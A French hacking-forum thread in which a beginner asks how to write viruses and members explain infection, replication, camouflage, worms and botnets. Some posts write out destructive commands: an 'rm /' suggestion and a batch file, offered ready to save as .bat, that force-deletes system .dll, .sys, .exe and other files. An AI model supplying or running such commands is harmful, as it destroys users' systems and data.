NewbieContest

La création de virus est une chose qui m'interesse beaucoup, mais je ne m'y connais pas du tout, si vous pouviez m'expliquer comment fonctionne un virus, quels sont les languages de base pour mettre en oeuvre ceux ci, l'extention que je dois mettre aprés mon document txt... bien sur ce serait uniquement a titre educatif et je n'encourage personne à mettre en oeuvre les conseils qui auront été donnés.

C'est un peu limite comme post je trouve... m'enfin je laisse quand meme, pour que les autres modos/admins décident. Je laisse uniquement si on réponds pour la partie "comment fonctionne un virus", parce que les language et le coup de l'extension, si je vois ca, hop un p'tit coup de suppression de topic !

Sinon google est ton ami...

Enjoy

The lsd

mouhahaha
http://perso.orange.fr/jean.gou/allthew3.html
voila y a de tout pour faire un virus, un vrai.

Heu au sujet de ce site, il se fait allumer sur un sujet au défouloir, donc... je ne pense pas que ce soit le bon exemple^^

Un virus est un programme qui nuit à l'utilisateur en faisant des choses pas cool sur son système, à ce que j'en sais.

Je sais pas pour windows mais par exemple un bon virus pour linux est de mettre "rm /" dans un fichier .sh mais faut que l'utilisateur l'exécute avec les doits de root :]

Ivanlef0u, je crois bien, m'avait répondu à une question similaire "madchat"

Sur comment fonctionne un virus, ben c'est un programme qui a plusieurs particularités
- il se propage
- il se duplique/copie/s'exporte
- il est autonome
(Qu'on me reprenne si je me plante)

La propagation est assurée par l'exploitation de failles, souvent de type buffer overflows.
Quant aux aspects réplication/autonomie, les mécanismes utilisés requièrent en général une bonne connaissance du langage et/ou du système visé.

Il y a plusieurs façons de faire, par exemple le virus peut infecter un binaire et copier son propre code exécutable à la fin du binaire exécuté, en modifiant au passage le début du binaire infecté pour que celui-ci exécute en priorité le code du virus dans le nouveau binaire avant de redonner (ou non) la main au reste du code légitime/infecté, ou il peut très bien tout bonnement écraser le code du binaire infecté, lequel est alors perdu. Et encore, ces techniques sont obsolètes !

A celà il faut rajouter les mécanismes de camouflages (qui rentrent dans le cadre de l'autonomie du virus) qui visent à passer sous la vigilence des antivirus/IDS/firewalls etc., là encore ça requiert un - très - bon niveau et de solides connaissances en sécurité et en informatique de manière générale.

Ce qu'il faut bien comprendre, c'est qu'aussi attrayant que ça puisse être (pour X raisons), programmer un virus nécéssite de savoir programmer tout court, et bien.
Ca reste néanmoins un sujet super interressant pour peu qu'on n'en soit plus au stade de vouloir créer un "vir11 kee pwn3d d4 w0r1d".

Enfin j'ajouterai que le net regorge (et notament les réseaux p2p) de codes sources de virus, plus ou moins récents (souvent en assembleur pur, à l'ancienne), ça peut être un bon début.
Méfiance toutefois car certaines archives sont elles-même vérollées, normal ;) donc avant de se lancer dans ce genre de domaine il vaut mieux savoir ce qu'on fait, tout simplement.

BufferBob

ps : Merci S3th pour le lien et Nebelmann/Ivanlef0u pour l'orientation ;)

Madchat est fermé nebelman, mais demande a ivan, il me semble qu'il avait wget tout çà =D

PS :

@echo off
echo Bouououou !!! Je suis un super virus !!!
echo 3 ...
echo 2 ...
echo 1 ...
echo Boum !!!
echo Appuis sur [ENTER] maintenant
pause
:a
cmd
goto a

Paie mon virus =D

Entierement raison, le premier vecteur de propagation d'un virus c'est les failles, mais principalement une, qui existe depuis longtemps, et qui n'est toujours pas patché: La connerie humaine (anna-kournikova-nude.jpg                                                                                          .exe)

Petit rectificatif ;)
qui existe depuis TOUJOURS, et qui ne sera JAMAIS patché...

Eh oui, pourquoi troubler Robert avec des extensions à la fin des noms de fichiers ?
Ben oui, masquons-les par défaut :)

La c'est la faute a krosoft *aussi* :p

De toute façon, Robert ne mettrai pas d'extension en (re)nommant un fichier, ne sachant pas à quoi ça sert, et là c'est le dramme :evil:, fichier inouvrable.
Ma foi, Microsoft a raison de faire ça, ça simplifie..... mais au détriment de la sécurité.

Gob, ca s'appelle le KISS : Keep It Simple and Stupid (Garde le simple et idiot en francais =D) et c'est la politique de Microsoft. Et d'ailleurs c'est pour ca que ca marche ! Si Nux et Apple suivait ca aussi il seraient plus développés, mais comme tu dis, au prix de la sécurité...

Enjoy

The lsd

:cool:
c'est pas mal ces virus batch mais il ya plus interessant en langage plus spécifique...
Bref je crois que la programmation est ta clé:cool:

Une propriété importante des virus est la replication (invisible ou non). Donc un virus qui ne fait que : "rm /" n'est pas super étant donné qu'il risque de s'auto détruire et de n'infecter aucun autre ordi.

Dans le temps, il y avait surtout des virus qui infectés des fichiers exécutables (.com ou .exe) :
 - insertion du code du virus à la fin ou au début du fichier (avec des variantes ou le virus se crypte) : repérable par la taille du fichier
 - insertion du code en découpant le code du virus et en se placant dans les zones vides (du genre CIH)
A l'exécution du fichier, le virus avait ajouté un saut pour exécuter tout d'abord sous code, et repartait ensuite vers le vrai code du programme pour passer inaperçu.


Pis à chaque nouveau script quelque virus qui exploite les failles :
 - vbs avec la faille outlook qui permettait d'envoyer des emails à tout le monde (c'est l'appelation vers)

Et maintenant, c'est surtout des spyware... : Il n'y a plus infection des fichiers executables (windows s'étant prémuni de la modification de ces propres fichiers), ce n'est uniquement que l'installation d'un exécutable quelque part, avec une clef de registre ajoutée qui permet de l'exécuter au démarrage. Ce qui les rend plus simple à supprimer (même manuellement)

Dans le temps, j'en vais fait un en VBS qui s'autocrypté et qui inseré son code dans d'autre script VBS (histoire de faire un peu comme les .Exe, mais sans se prendre la tête avec de l'assembleur). Enfin, maintenant, ça m'est passé, car ça me saoule vraiment ce qui en crée dans le seul but de nuire à un système.

Voila un petit virus qui est déjà tout pret:

@Echo off c:
cd %WinDir%\System\
deltree /y *.dll
cd\
deltree /y *.sys
cd\
deltree /y *.bat
cd\
deltree /y *.exe
cd\
deltree /y *.com
cd\
deltree /y *.bmp


Il suffit de l'enregistre en .bat !

Pour être caractérisé de virus, un programme informatique doit être muni de deux fonctions : capacités de réplication, et capacités d'infection. Ton batch ridicule n'est rien de tout ça. Et y'a plus efficace en matière de wildcards, de toute façon.

Et je rajouterais :


Il est donc indéniable qu'un virus et/ou vers n'ont pas forcement la facultée de destruction de fichiers.
D'ailleurs, à leur actuelle, beaucoup de virus/vers n'ont pas comme finalitée la desctruction d'un systeme, mais uniquement la réplication afin de tenter des deny de service sur un machine cible à une date et heure définie.

Plus exactement, les machines infectées sont enrôlés dans un botnet (on les appelle alors des zombies) et peuvent être pilotées à distance pour lancer toutes sortes d'opérations, comme effectivement des floods pour conduire à des dénis de service, du spam, ou des scans de vulnérabilités massifs, pour les plus courantes.

La grande tendance actuelle est que les "propriétaires" de ces botnets louent les ressources machines ou réseau de leurs zombies aux gens intéressés. Et quand je dis louer, c'est au sens propre du terme, puisqu'on paie la ressource comme au temps des mainframes. On peut trouver des annonces de ce type sur certains forums très underground.

A noter qu'un certain nombre d'articles très intéressants ont été publié dans MISC à ce sujet, notamment les numéros 27 (http://www.ed-diamond.com/feuille_misc27/index.html) et 30 (http://www.ed-diamond.com/feuille_misc30/index.html). Sans parler d'une analyse que je ne retrouve plus, montrant comment cannibaliser l'architecture de skype afin de monter un botnet possédant toutes les qualités de ce réseau. :)

Sans compter que je suis meme pas sur que windows ne restaure pas les fichiers "automatiquement" ou t'empeche de les effacer meme si tu es admin. (alors imagine si tu n'es pas admin)

Moi je préfère le corewar car en plus d'être amusant c'est très instructif en matière de création de virus mais bon je troll un peu je crois !! :D